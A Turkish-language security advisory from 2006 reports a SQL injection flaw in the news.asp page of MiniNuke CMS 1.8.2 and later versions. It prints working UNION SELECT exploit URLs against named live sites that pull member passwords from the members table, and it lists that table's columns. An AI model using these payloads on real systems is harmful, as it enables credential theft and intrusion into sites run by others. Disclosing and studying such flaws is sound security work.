Bilişim Güvenliği
Mininuke CMS System <= 1.8.2 (News.Asp) SQL Injection Vulnerability
Mininuke CMS System <= 1.8.2 (News.Asp) SQL Injection Vulnerability
-
--Güvenlik Raporu--
Nedir: MiniNuke CMS System <= 1.8.2 (news.asp) SQL Injection vulnerability
---
Yazar: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Tarih: 12/01/06 08:47 PM
---
Kontaklar:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web: http://www.nukedx.com
}
---
Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 ve muhtemelen alt sürümler.
Hakkında:Bu metodla uzaktan saldıran birisi news.aspye SQL sorgusu çalıştırabilmekte.
---
Nasıl&Örnek: GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery]
http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=52
MEMBERS kolonları:
uye_id
sifre
g_soru
g_cevap
email
isim
icq
msn
aim
meslek
cinsiyet
yas
url
imza
mail_goster
avurl
avatar
--
ajana sevgilerle
Saygılar,
NWPX team adına
nuker a.k.a nukedxEdited: 13/01/06-->
Ayrıca SQL injection açığı sadece 1.8.2 ve altını değil mevcut bütün mini-nuke sürümlerinde bulunmaktadır.
Örnek kod 1.8.2 ve üstü için
http://www.mini-nuke.info/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0,0+from+members+where+uye_id=52
Referanslar:
http://www.securityfocus.com/archive/1/421747/30/0/threaded
http://seclists.org/lists/fulldisclosure/2006/Jan/0444.html
http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0439.html<--